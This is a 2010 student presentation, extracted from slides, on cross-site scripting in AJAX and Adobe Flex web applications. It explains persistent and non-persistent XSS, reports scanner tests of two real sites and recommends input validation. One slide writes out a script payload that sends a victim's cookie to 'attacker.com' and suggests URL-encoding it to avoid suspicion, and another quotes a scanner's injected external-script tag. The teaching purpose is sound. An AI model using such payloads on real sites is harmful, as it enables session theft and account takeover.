Presentation_Danielle_Cauthen

advertisement
Cross-Site Scripting (XSS) Vulnerability
in AJAX and Adobe Flex Applications
Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management
What is Cross-Site Scripting?
Cross-Site Scripting, or XSS (not to be confused
with CSS or Cascading Style Sheets), allows
attackers to inject client-side script in a web
page.
 The attacker injects script, such as JavaScript,
VBScript, ActiveX, HTML, or Flash into an
application to try to get access to sensitive
information
 Dynamic websites (using AJAX, Flex, for
example) are vulnerable. Static websites are not
at risk.

Diagram of XSS Attack
*From CGISecurity.com
XSS Compared to Other Vulnerabilities

XSS is the #1 website security issue, with a 66% percentage
likelihood that a website has the vulnerability:
Statistics from WhiteHat Website Security Report, Fall 2009 edition
XSS Types

Two types of XSS attacks:
◦ Nonaltering (or Non Persistent): causes
no change to the page functionality
◦ Altering (or Persistent): a script injection
that can be placed permanently in the
database which causes change to the page
functionality that will persist each time the
page is requested
Non-Altering (Non-Persistant)
Attacker can take a URL that contains
personal data, i.e.
www.website.com/username=danielle
and modify the username field by entering
JavaScript to steal the cookie, altering the
url to
www.website.com/username=<script>do
cument.location='http://attacker.com/coo
kiesteal.cgi?'+document.cookie</script>
 To diminish suspicion attacker can URL
encode JavaScript so it’s not apparent

Altering (Persistent)
Within a forum, users posts may be
stored in a database, usually being tracked
by a session id cookie
 An attacker can post a message
containing malicious script, that if a user
reads, may compromise their account

Threat to AJAX


Because of the JavaScript and client-side scripting of
AJAX, its largest security risk is XSS
From AJAX:The Definitive Guide:
◦ “Before Ajax, any attack made with an XSS
vulnerability was done while the user's browser was
in a wait state, and it usually coincided with some kind
of visual indication by the browser that would give
the user reason to think something untoward was
happening.
◦ Once Ajax was introduced, this visual cue would
disappear, and the user would have no way of knowing
whether malicious code was being executed from the
browser.”
Threat to Adobe Flex


Though not as common as with AJAX, Flex has also
been prone to cross-site scripting, especially if HTML
and other scripting features are used in a Flex
application
However Adobe, realizing the threat, has strict security
in place to prevent XSS.
◦ By default, you cannot call script on an HTML page if
the HTML page is not in the same domain as the Flex
application.
◦ Since Flex application is compiled into swf, it cannot
itself be vulnerable to XSS
◦ The sandbox security model prevents private
information being sent elsewhere.
Testing for XSS Vulnerabilities
Acunetix Web Vulnerability Scanner – tool
that scans web applications for XSS
vulnerabilities (more useful with AJAX
applications)
 HP SWFScan – tool that is helpful in finding
security vulnerabilities in Flex/Flash applications.
It decompiles and extracts the code from the
.swf file, and then analyzes it for vulnerabilities

Testing AJAX Application
Using Acunetix, Kayak.com (the AJAX web
application for travel comparison) was found to
have 146 vulnerabilities
 Example: when a user clicks on a menu item,
such as Flights, that information is submitted as a
GET in a variable named tab. Acunetix was able
to manipulate this variable numerous times, on
one occasion setting tab to
<ScRiPt+bad=">"+src="http://testphp.acutenix.com
/xss.js?40392"></ScRiPt>

Testing AJAX
Flex
Using HP SWFScan, tested Flex
application Sherwin Williams Color
Visualizer (www.sherwinwilliams.com/visualizer)
 No XSS vulnerabilities were found

Testing Flex
Conclusion
XSS can be both damaging and costly
while compromising user security
 XSS is bigger risk to AJAX, due to the
JavaScript and client-side scripting
 Flex is vulnerable but a lot more resistant
due to Adobe security features
 Developers of both AJAX and Flex
applications should check and validate any
input to ensure it doesn’t include script

References

Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from
http://www.acunetix.com/vulnerability-scanner/download.htm

Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved
from http://kb2.adobe.com/cps/196/tn_19604.html

Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide.
Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf

Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved
from http://www.cgisecurity.com/xss-faq.html

Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved
from http://www.brothersoft.com/hp-swfscan-253747.html

Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA:
O’Reilly Media

WhiteHat Security (2009). WhiteHat Website Security Statistics Report.
Retrieved from
http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf
Download